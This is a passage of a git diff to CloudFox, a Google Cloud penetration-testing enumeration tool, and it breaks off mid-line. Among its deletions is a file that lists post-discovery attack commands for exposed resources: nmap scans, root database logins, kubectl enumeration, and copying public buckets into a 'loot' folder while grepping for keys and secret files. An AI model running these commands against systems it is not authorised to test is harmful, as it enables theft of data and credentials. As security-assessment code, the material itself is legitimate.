`json:"network"` - Subnet string `json:"subnet"` - NoPublicIP bool `json:"noPublicIp"` - NoProxyAccess bool `json:"noProxyAccess"` - CreateTime string `json:"createTime"` - UpdateTime string `json:"updateTime"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + ProxyUri string `json:"proxyUri"` + Creator string `json:"creator"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` // Disk config - BootDiskType string `json:"bootDiskType"` - BootDiskSizeGB int64 `json:"bootDiskSizeGb"` - DataDiskType string `json:"dataDiskType"` - DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` // GPU config - AcceleratorType string `json:"acceleratorType"` - AcceleratorCount int64 `json:"acceleratorCount"` + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` - // Security config - InstallGpuDriver bool `json:"installGpuDriver"` - CustomContainer bool `json:"customContainer"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + // Other config + InstallGpuDriver bool `json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` } // RuntimeInfo represents a managed notebook runtime type RuntimeInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - State string `json:"state"` - RuntimeType string `json:"runtimeType"` - MachineType string `json:"machineType"` - ServiceAccount string `json:"serviceAccount"` - Network string `json:"network"` - Subnet string `json:"subnet"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` } // ListInstances retrieves all notebook instances @@ -148,7 +144,6 @@ func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID MachineType: extractName(instance.MachineType), CreateTime: instance.CreateTime, UpdateTime: instance.UpdateTime, - RiskReasons: []string{}, } // Service account @@ -160,6 +155,10 @@ func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID info.NoPublicIP = instance.NoPublicIp info.NoProxyAccess = instance.NoProxyAccess + // Proxy URI and Creator + info.ProxyUri = instance.ProxyUri + info.Creator = instance.Creator + // Boot disk info.BootDiskType = instance.BootDiskType info.BootDiskSizeGB = instance.BootDiskSizeGb @@ -180,18 +179,15 @@ func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID info.CustomContainer = true } - info.RiskLevel, info.RiskReasons = s.analyzeInstanceRisk(info) - return info } func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { info := RuntimeInfo{ - Name: extractName(runtime.Name), - ProjectID: projectID, - Location: extractLocation(runtime.Name), - State: runtime.State, - RiskReasons: []string{}, + Name: extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, } if runtime.VirtualMachine != nil { @@ -208,73 +204,9 @@ func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID st info.ServiceAccount = runtime.AccessConfig.RuntimeOwner } - info.RiskLevel, info.RiskReasons = s.analyzeRuntimeRisk(info) - return info } -func (s *NotebooksService) analyzeInstanceRisk(instance NotebookInstanceInfo) (string, []string) { - var reasons []string - score := 0 - - // Public IP - if !instance.NoPublicIP { - reasons = append(reasons, "Has public IP address") - score += 2 - } - - // Proxy access enabled (allows web access) - if !instance.NoProxyAccess { - reasons = append(reasons, "Proxy access enabled (web access)") - score += 1 - } - - // Default service account - if instance.ServiceAccount == "" || strings.Contains(instance.ServiceAccount, "compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine service account") - score += 2 - } - - // Custom container (potential supply chain risk) - if instance.CustomContainer { - reasons = append(reasons, "Uses custom container image") - score += 1 - } - - // GPU (high-value target, expensive) - if instance.AcceleratorCount > 0 { - reasons = append(reasons, fmt.Sprintf("Has GPU attached (%s x%d)", instance.AcceleratorType, instance.AcceleratorCount)) - score += 1 - } - - if score >= 4 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *NotebooksService) analyzeRuntimeRisk(runtime RuntimeInfo) (string, []string) { - var reasons []string - score := 0 - - // Check for default SA patterns - if runtime.ServiceAccount == "" { - reasons = append(reasons, "No explicit service account configured") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullName string) string { parts := strings.Split(fullName, "/") if len(parts) > 0 { diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go index 2a147476..0eb96d7b 100644 --- a/gcp/services/orgpolicyService/orgpolicyService.go +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -21,20 +21,18 @@ func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { return &OrgPolicyService{session: session} } -// OrgPolicyInfo represents an organization policy with security analysis +// OrgPolicyInfo represents an organization policy type OrgPolicyInfo struct { - Name string `json:"name"` - Constraint string `json:"constraint"` - ProjectID string `json:"projectId"` - Enforced bool `json:"enforced"` - AllowAll bool `json:"allowAll"` - DenyAll bool `json:"denyAll"` - AllowedValues []string `json:"allowedValues"` - DeniedValues []string `json:"deniedValues"` - InheritParent bool `json:"inheritFromParent"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - SecurityImpact string `json:"securityImpact"` + Name string `json:"name"` + Constraint string `json:"constraint"` + ProjectID string `json:"projectId"` + Enforced bool `json:"enforced"` + AllowAll bool `json:"allowAll"` + DenyAll bool `json:"denyAll"` + AllowedValues []string `json:"allowedValues"` + DeniedValues []string `json:"deniedValues"` + InheritParent bool `json:"inheritFromParent"` + Description string `json:"description"` } // SecurityRelevantConstraints maps constraint names to their security implications @@ -194,6 +192,11 @@ func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolic info.Constraint = "constraints/" + parts[1] } + // Get description from SecurityRelevantConstraints if available + if secInfo, ok := SecurityRelevantConstraints[info.Constraint]; ok { + info.Description = secInfo.Description + } + // Parse the spec if policy.Spec != nil { info.InheritParent = policy.Spec.InheritFromParent @@ -215,68 +218,6 @@ func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolic } } - // Analyze risk - info.RiskLevel, info.RiskReasons, info.SecurityImpact = s.analyzePolicy(info) - return info } -func (s *OrgPolicyService) analyzePolicy(policy OrgPolicyInfo) (string, []string, string) { - var reasons []string - var impact string - riskScore := 0 - - // Get security context for this constraint - secInfo, isSecurityRelevant := SecurityRelevantConstraints[policy.Constraint] - - if isSecurityRelevant { - impact = secInfo.RiskWhenWeak - - // Check if policy is weakened - if policy.AllowAll { - reasons = append(reasons, fmt.Sprintf("Policy allows ALL values - %s", secInfo.Description)) - riskScore += 3 - } - - // Check for overly permissive allowed values - if len(policy.AllowedValues) > 0 { - if containsWildcard(policy.AllowedValues) { - reasons = append(reasons, "Allowed values contains wildcard pattern") - riskScore += 2 - } - } - - // Check if important security constraint is not enforced - if !policy.Enforced && secInfo.DefaultSecure { - reasons = append(reasons, fmt.Sprintf("Security constraint not enforced: %s", secInfo.Description)) - riskScore += 2 - } - - // Check for inheritance issues - if policy.InheritParent && policy.AllowAll { - reasons = append(reasons, "Inherits from parent but also allows all - may override parent restrictions") - riskScore += 1 - } - } else { - impact = "Custom or less common constraint" - } - - // Determine risk level - if riskScore >= 3 { - return "HIGH", reasons, impact - } else if riskScore >= 2 { - return "MEDIUM", reasons, impact - } else if riskScore >= 1 { - return "LOW", reasons, impact - } - return "INFO", reasons, impact -} - -func containsWildcard(values []string) bool { - for _, v := range values { - if v == "*" || strings.Contains(v, "/*") || v == "under:*" { - return true - } - } - return false -} diff --git a/gcp/services/publicResourcesService/publicResourcesService.go b/gcp/services/publicResourcesService/publicResourcesService.go deleted file mode 100644 index a65edfc3..00000000 --- a/gcp/services/publicResourcesService/publicResourcesService.go +++ /dev/null @@ -1,538 +0,0 @@ -package publicresourcesservice - -import ( - "context" - "fmt" - "strings" - - compute "google.golang.org/api/compute/v1" - container "google.golang.org/api/container/v1" - run "google.golang.org/api/run/v2" - cloudfunctions "google.golang.org/api/cloudfunctions/v2" - sqladmin "google.golang.org/api/sqladmin/v1beta4" - storage "google.golang.org/api/storage/v1" -) - -type PublicResourcesService struct{} - -func New() *PublicResourcesService { - return &PublicResourcesService{} -} - -// PublicResource represents any internet-exposed GCP resource -type PublicResource struct { - ResourceType string // compute, cloudsql, cloudrun, function, gke, bucket, lb - Name string - ProjectID string - Location string - PublicEndpoint string // URL or IP - Port string // Port if applicable - Protocol string // HTTP, HTTPS, TCP, etc. - AccessLevel string // allUsers, allAuthenticatedUsers, authorized-networks, etc. - ServiceAccount string // Associated SA if any - RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW - RiskReasons []string - ExploitCommands []string -} - -// EnumeratePublicResources finds all public resources in a project -func (s *PublicResourcesService) EnumeratePublicResources(projectID string) ([]PublicResource, error) { - var resources []PublicResource - - // Enumerate each resource type - if computeResources, err := s.getPublicComputeInstances(projectID); err == nil { - resources = append(resources, computeResources...) - } - - if sqlResources, err := s.getPublicCloudSQL(projectID); err == nil { - resources = append(resources, sqlResources...) - } - - if runResources, err := s.getPublicCloudRun(projectID); err == nil { - resources = append(resources, runResources...) - } - - if funcResources, err := s.getPublicFunctions(projectID); err == nil { - resources = append(resources, funcResources...) - } - - if gkeResources, err := s.getPublicGKE(projectID); err == nil { - resources = append(resources, gkeResources...) - } - - if bucketResources, err := s.getPublicBuckets(projectID); err == nil { - resources = append(resources, bucketResources...) - } - - if lbResources, err := s.getPublicLoadBalancers(projectID); err == nil { - resources = append(resources, lbResources...) - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicComputeInstances(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := compute.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - // List all instances across all zones - req := service.Instances.AggregatedList(projectID) - err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { - for zone, instances := range page.Items { - zoneName := zone - if strings.HasPrefix(zone, "zones/") { - zoneName = strings.TrimPrefix(zone, "zones/") - } - - for _, instance := range instances.Instances { - for _, nic := range instance.NetworkInterfaces { - for _, access := range nic.AccessConfigs { - if access.NatIP != "" { - resource := PublicResource{ - ResourceType: "compute", - Name: instance.Name, - ProjectID: projectID, - Location: zoneName, - PublicEndpoint: access.NatIP, - Protocol: "TCP/UDP", - AccessLevel: "Public IP", - RiskLevel: "MEDIUM", - RiskReasons: []string{"Instance has external IP"}, - ExploitCommands: []string{ - fmt.Sprintf("# Scan for open ports:\nnmap -sV %s", access.NatIP), - fmt.Sprintf("# SSH if port 22 open:\nssh -i ~/.ssh/google_compute_engine %s", access.NatIP), - fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", instance.Name, zoneName, projectID), - }, - } - - // Check service account - if len(instance.ServiceAccounts) > 0 { - resource.ServiceAccount = instance.ServiceAccounts[0].Email - } - - resources = append(resources, resource) - } - } - } - } - } - return nil - }) - - return resources, err -} - -func (s *PublicResourcesService) getPublicCloudSQL(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := sqladmin.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - resp, err := service.Instances.List(projectID).Do() - if err != nil { - return nil, err - } - - for _, instance := range resp.Items { - // Check for public IP - for _, ip := range instance.IpAddresses { - if ip.Type == "PRIMARY" && ip.IpAddress != "" { - // Check if authorized networks include 0.0.0.0/0 - worldAccessible := false - var authNetworks []string - if instance.Settings != nil && instance.Settings.IpConfiguration != nil { - for _, net := range instance.Settings.IpConfiguration.AuthorizedNetworks { - authNetworks = append(authNetworks, net.Value) - if net.Value == "0.0.0.0/0" { - worldAccessible = true - } - } - } - - riskLevel := "MEDIUM" - riskReasons := []string{"Cloud SQL has public IP"} - if worldAccessible { - riskLevel = "CRITICAL" - riskReasons = append(riskReasons, "Authorized networks include 0.0.0.0/0 (world accessible)") - } - - port := "3306" // MySQL default - if strings.Contains(strings.ToLower(instance.DatabaseVersion), "postgres") { - port = "5432" - } else if strings.Contains(strings.ToLower(instance.DatabaseVersion), "sqlserver") { - port = "1433" - } - - resource := PublicResource{ - ResourceType: "cloudsql", - Name: instance.Name, - ProjectID: projectID, - Location: instance.Region, - PublicEndpoint: ip.IpAddress, - Port: port, - Protocol: "TCP", - AccessLevel: fmt.Sprintf("AuthNetworks: %s", strings.Join(authNetworks, ", ")), - RiskLevel: riskLevel, - RiskReasons: riskReasons, - ExploitCommands: []string{ - fmt.Sprintf("# Connect via Cloud SQL Proxy:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), - fmt.Sprintf("# Direct connection (if authorized):\nmysql -h %s -u root -p", ip.IpAddress), - fmt.Sprintf("# List databases:\ngcloud sql databases list --instance=%s --project=%s", instance.Name, projectID), - fmt.Sprintf("# List users:\ngcloud sql users list --instance=%s --project=%s", instance.Name, projectID), - }, - } - resources = append(resources, resource) - } - } - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicCloudRun(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := run.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := service.Projects.Locations.Services.List(parent).Do() - if err != nil { - return nil, err - } - - for _, svc := range resp.Services { - // Check if publicly invokable - isPublic := false - accessLevel := "Authenticated" - - // Check IAM for allUsers/allAuthenticatedUsers - iamResp, err := service.Projects.Locations.Services.GetIamPolicy(svc.Name).Do() - if err == nil { - for _, binding := range iamResp.Bindings { - if binding.Role == "roles/run.invoker" { - for _, member := range binding.Members { - if member == "allUsers" { - isPublic = true - accessLevel = "allUsers (PUBLIC)" - } else if member == "allAuthenticatedUsers" { - isPublic = true - accessLevel = "allAuthenticatedUsers" - } - } - } - } - } - - // Check ingress setting - ingress := svc.Ingress - if ingress == "INGRESS_TRAFFIC_ALL" && isPublic { - riskLevel := "HIGH" - if accessLevel == "allUsers (PUBLIC)" { - riskLevel = "CRITICAL" - } - - // Extract location from service name - parts := strings.Split(svc.Name, "/") - location := "" - if len(parts) >= 4 { - location = parts[3] - } - - resource := PublicResource{ - ResourceType: "cloudrun", - Name: svc.Name, - ProjectID: projectID, - Location: location, - PublicEndpoint: svc.Uri, - Port: "443", - Protocol: "HTTPS", - AccessLevel: accessLevel, - RiskLevel: riskLevel, - RiskReasons: []string{"Cloud Run service publicly accessible"}, - ExploitCommands: []string{ - fmt.Sprintf("# Invoke the service:\ncurl -s %s", svc.Uri), - fmt.Sprintf("# Invoke with auth:\ncurl -s -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s", svc.Uri), - fmt.Sprintf("# Describe service:\ngcloud run services describe %s --region=%s --project=%s", svc.Name, location, projectID), - }, - } - - if svc.Template != nil && len(svc.Template.Containers) > 0 { - resource.ServiceAccount = svc.Template.ServiceAccount - } - - resources = append(resources, resource) - } - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicFunctions(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := cloudfunctions.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := service.Projects.Locations.Functions.List(parent).Do() - if err != nil { - return nil, err - } - - for _, fn := range resp.Functions { - // Check IAM for public access - iamResp, err := service.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() - if err != nil { - continue - } - - isPublic := false - accessLevel := "Authenticated" - for _, binding := range iamResp.Bindings { - if binding.Role == "roles/cloudfunctions.invoker" { - for _, member := range binding.Members { - if member == "allUsers" { - isPublic = true - accessLevel = "allUsers (PUBLIC)" - } else if member == "allAuthenticatedUsers" { - isPublic = true - accessLevel = "allAuthenticatedUsers" - } - } - } - } - - if isPublic { - riskLevel := "HIGH" - if accessLevel == "allUsers (PUBLIC)" { - riskLevel = "CRITICAL" - } - - // Extract location - parts := strings.Split(fn.Name, "/") - location := "" - if len(parts) >= 4 { - location = parts[3] - } - - // Get URL from service config - url := "" - if fn.ServiceConfig != nil { - url = fn.ServiceConfig.Uri - } - - resource := PublicResource{ - ResourceType: "function", - Name: fn.Name, - ProjectID: projectID, - Location: location, - PublicEndpoint: url, - Port: "443", - Protocol: "HTTPS", - AccessLevel: accessLevel, - RiskLevel: riskLevel, - RiskReasons: []string{"Cloud Function publicly invokable"}, - ExploitCommands: []string{ - fmt.Sprintf("# Invoke the function:\ncurl -s %s", url), - fmt.Sprintf("# Invoke with auth:\ncurl -s -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s", url), - fmt.Sprintf("# Describe function:\ngcloud functions describe %s --region=%s --project=%s --gen2", fn.Name, location, projectID), - }, - } - - if fn.ServiceConfig != nil { - resource.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail - } - - resources = append(resources, resource) - } - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicGKE(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := container.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := service.Projects.Locations.Clusters.List(parent).Do() - if err != nil { - return nil, err - } - - for _, cluster := range resp.Clusters { - isPublic := false - riskReasons := []string{} - - // Check if cluster has public endpoint - if cluster.PrivateClusterConfig == nil || !cluster.PrivateClusterConfig.EnablePrivateEndpoint { - if cluster.Endpoint != "" { - isPublic = true - riskReasons = append(riskReasons, "GKE API endpoint is public") - } - } - - // Check master authorized networks - if cluster.MasterAuthorizedNetworksConfig == nil || !cluster.MasterAuthorizedNetworksConfig.Enabled { - riskReasons = append(riskReasons, "No master authorized networks configured") - } - - if isPublic { - riskLevel := "MEDIUM" - if len(riskReasons) > 1 { - riskLevel = "HIGH" - } - - resource := PublicResource{ - ResourceType: "gke", - Name: cluster.Name, - ProjectID: projectID, - Location: cluster.Location, - PublicEndpoint: cluster.Endpoint, - Port: "443", - Protocol: "HTTPS", - AccessLevel: "Public API", - RiskLevel: riskLevel, - RiskReasons: riskReasons, - ExploitCommands: []string{ - fmt.Sprintf("# Get cluster credentials:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), - "# Check permissions:\nkubectl auth can-i --list", - "# List namespaces:\nkubectl get namespaces", - "# List pods:\nkubectl get pods -A", - }, - } - resources = append(resources, resource) - } - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicBuckets(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := storage.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - resp, err := service.Buckets.List(projectID).Do() - if err != nil { - return nil, err - } - - for _, bucket := range resp.Items { - // Check IAM policy for public access - iamResp, err := service.Buckets.GetIamPolicy(bucket.Name).Do() - if err != nil { - continue - } - - isPublic := false - accessLevel := "Private" - publicRoles := []string{} - - for _, binding := range iamResp.Bindings { - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - isPublic = true - accessLevel = member - publicRoles = append(publicRoles, binding.Role) - } - } - } - - if isPublic { - riskLevel := "HIGH" - riskReasons := []string{fmt.Sprintf("Bucket accessible by %s", accessLevel)} - for _, role := range publicRoles { - riskReasons = append(riskReasons, fmt.Sprintf("Public role: %s", role)) - if strings.Contains(role, "objectAdmin") || strings.Contains(role, "storage.admin") { - riskLevel = "CRITICAL" - } - } - - resource := PublicResource{ - ResourceType: "bucket", - Name: bucket.Name, - ProjectID: projectID, - Location: bucket.Location, - PublicEndpoint: fmt.Sprintf("https://storage.googleapis.com/%s", bucket.Name), - Protocol: "HTTPS", - AccessLevel: accessLevel, - RiskLevel: riskLevel, - RiskReasons: riskReasons, - ExploitCommands: []string{ - fmt.Sprintf("# List bucket contents:\ngsutil ls gs://%s/", bucket.Name), - fmt.Sprintf("# Download all files:\ngsutil -m cp -r gs://%s/ ./loot/", bucket.Name), - fmt.Sprintf("# Check for sensitive files:\ngsutil ls -r gs://%s/ | grep -iE '\\.(pem|key|json|env|tfstate|sql|bak)'", bucket.Name), - }, - } - resources = append(resources, resource) - } - } - - return resources, nil -} - -func (s *PublicResourcesService) getPublicLoadBalancers(projectID string) ([]PublicResource, error) { - ctx := context.Background() - service, err := compute.NewService(ctx) - if err != nil { - return nil, err - } - - var resources []PublicResource - - // Get global forwarding rules (external load balancers) - resp, err := service.GlobalForwardingRules.List(projectID).Do() - if err != nil { - return nil, err - } - - for _, rule := range resp.Items { - if rule.IPAddress != "" { - resource := PublicResource{ - ResourceType: "loadbalancer", - Name: rule.Name, - ProjectID: projectID, - Location: "global", - PublicEndpoint: rule.IPAddress, - Port: rule.PortRange, - Protocol: rule.IPProtocol, - AccessLevel: "Public", - RiskLevel: "LOW", - RiskReasons: []string{"External load balancer with public IP"}, - ExploitCommands: []string{ - fmt.Sprintf("# Scan the endpoint:\nnmap -sV %s", rule.IPAddress), - fmt.Sprintf("# Test HTTP:\ncurl -v http://%s/", rule.IPAddress), - fmt.Sprintf("# Test HTTPS:\ncurl -vk https://%s/", rule.IPAddress), - }, - } - resources = append(resources, resource) - } - } - - return resources, nil -} diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go index d4767116..89fdbb9b 100644 --- a/gcp/services/pubsubService/pubsubService.go +++ b/gcp/services/pubsubService/pubsubService.go @@ -15,57 +15,59 @@ func New() *PubSubService { return &PubSubService{} } +// IAMBinding represents a single IAM role/member binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + // TopicInfo holds Pub/Sub topic details with security-relevant information type TopicInfo struct { - Name string - ProjectID string - KmsKeyName string // Encryption key if set + Name string + ProjectID string + KmsKeyName string // Encryption key if set MessageRetentionDuration string - SchemaSettings string - Labels map[string]string + SchemaSettings string + Labels map[string]string - // IAM - PublisherMembers []string - SubscriberMembers []string - IsPublicPublish bool // allUsers/allAuthenticatedUsers can publish - IsPublicSubscribe bool // allUsers/allAuthenticatedUsers can subscribe + // IAM bindings + IAMBindings []IAMBinding // Subscriptions count - SubscriptionCount int + SubscriptionCount int } // SubscriptionInfo holds Pub/Sub subscription details type SubscriptionInfo struct { - Name string - ProjectID string - Topic string - TopicProject string // Topic may be in different project + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project // Configuration - AckDeadlineSeconds int64 - MessageRetention string - RetainAckedMessages bool - ExpirationPolicy string // TTL - Filter string + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string // Push configuration - PushEndpoint string // Empty if pull subscription - PushOIDCAudience string - PushServiceAccount string + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string // Dead letter - DeadLetterTopic string - MaxDeliveryAttempts int64 + DeadLetterTopic string + MaxDeliveryAttempts int64 // BigQuery export - BigQueryTable string + BigQueryTable string // Cloud Storage export - CloudStorageBucket string + CloudStorageBucket string - // IAM - ConsumerMembers []string - IsPublicConsume bool + // IAM bindings + IAMBindings []IAMBinding } // Topics retrieves all Pub/Sub topics in a project @@ -92,8 +94,7 @@ func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { // Try to get IAM policy iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) if iamErr == nil && iamPolicy != nil { - info.PublisherMembers, info.SubscriberMembers, - info.IsPublicPublish, info.IsPublicSubscribe = parseTopicBindings(iamPolicy) + info.IAMBindings = parseIAMBindings(iamPolicy) } topics = append(topics, info) @@ -128,7 +129,7 @@ func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, er // Try to get IAM policy iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) if iamErr == nil && iamPolicy != nil { - info.ConsumerMembers, info.IsPublicConsume = parseSubscriptionBindings(iamPolicy) + info.IAMBindings = parseIAMBindings(iamPolicy) } subscriptions = append(subscriptions, info) @@ -265,43 +266,21 @@ func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subsc return policy, nil } -// parseTopicBindings extracts who can publish/subscribe and checks for public access -func parseTopicBindings(policy *pubsub.Policy) (publishers []string, subscribers []string, publicPublish bool, publicSubscribe bool) { +// parseIAMBindings extracts all IAM bindings from a policy +func parseIAMBindings(policy *pubsub.Policy) []IAMBinding { + var bindings []IAMBinding for _, binding := range policy.Bindings { - switch binding.Role { - case "roles/pubsub.publisher": - publishers = append(publishers, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - publicPublish = true - } - } - case "roles/pubsub.subscriber": - subscribers = append(subscribers, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - publicSubscribe = true - } - } + if binding == nil { + continue } - } - return -} - -// parseSubscriptionBindings extracts who can consume messages -func parseSubscriptionBindings(policy *pubsub.Policy) (consumers []string, isPublic bool) { - for _, binding := range policy.Bindings { - if binding.Role == "roles/pubsub.subscriber" || - binding.Role == "roles/pubsub.viewer" { - consumers = append(consumers, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - isPublic = true - } - } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) } } - return + return bindings } // extractName extracts just the resource name from the full resource name diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go new file mode 100644 index 00000000..dbea1fb2 --- /dev/null +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -0,0 +1,649 @@ +package resourceiamservice + +import ( + "context" + "fmt" + "strings" + + "cloud.google.com/go/bigquery" + "cloud.google.com/go/kms/apiv1" + "cloud.google.com/go/kms/apiv1/kmspb" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" +) + +// ResourceIAMService handles enumeration of resource-level IAM policies +type ResourceIAMService struct { + session *gcpinternal.SafeSession +} + +// New creates a new ResourceIAMService +func New() *ResourceIAMService { + return &ResourceIAMService{} +} + +// NewWithSession creates a ResourceIAMService with a SafeSession +func NewWithSession(session *gcpinternal.SafeSession) *ResourceIAMService { + return &ResourceIAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *ResourceIAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// ResourceIAMBinding represents an IAM binding on a specific resource +type ResourceIAMBinding struct { + ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. + ResourceName string `json:"resourceName"` // Full resource name + ResourceID string `json:"resourceId"` // Short identifier + ProjectID string `json:"projectId"` + Role string `json:"role"` + Member string `json:"member"` + MemberType string `json:"memberType"` // user, serviceAccount, group, allUsers, allAuthenticatedUsers + MemberEmail string `json:"memberEmail"` + IsPublic bool `json:"isPublic"` // allUsers or allAuthenticatedUsers + HasCondition bool `json:"hasCondition"` + ConditionTitle string `json:"conditionTitle"` + ConditionExpression string `json:"conditionExpression"` // Full CEL expression +} + +// GetAllResourceIAM enumerates IAM policies across all supported resource types +func (s *ResourceIAMService) GetAllResourceIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var allBindings []ResourceIAMBinding + + // Get bucket IAM + bucketBindings, err := s.GetBucketIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bucketBindings...) + } + + // Get BigQuery dataset IAM + bqBindings, err := s.GetBigQueryDatasetIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bqBindings...) + } + + // Get Pub/Sub topic IAM + pubsubBindings, err := s.GetPubSubIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, pubsubBindings...) + } + + // Get Secret Manager IAM + secretBindings, err := s.GetSecretManagerIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, secretBindings...) + } + + // Get KMS IAM + kmsBindings, err := s.GetKMSIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, kmsBindings...) + } + + // Get Cloud Functions IAM + functionBindings, err := s.GetCloudFunctionsIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, functionBindings...) + } + + // Get Cloud Run IAM + runBindings, err := s.GetCloudRunIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, runBindings...) + } + + return allBindings, nil +} + +// GetBucketIAM enumerates IAM policies on Cloud Storage buckets +func (s *ResourceIAMService) GetBucketIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *storage.Client + var err error + if s.session != nil { + client, err = storage.NewClient(ctx, s.getClientOption()) + } else { + client, err = storage.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + defer client.Close() + + // List buckets + it := client.Buckets(ctx, projectID) + for { + bucketAttrs, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this bucket + bucket := 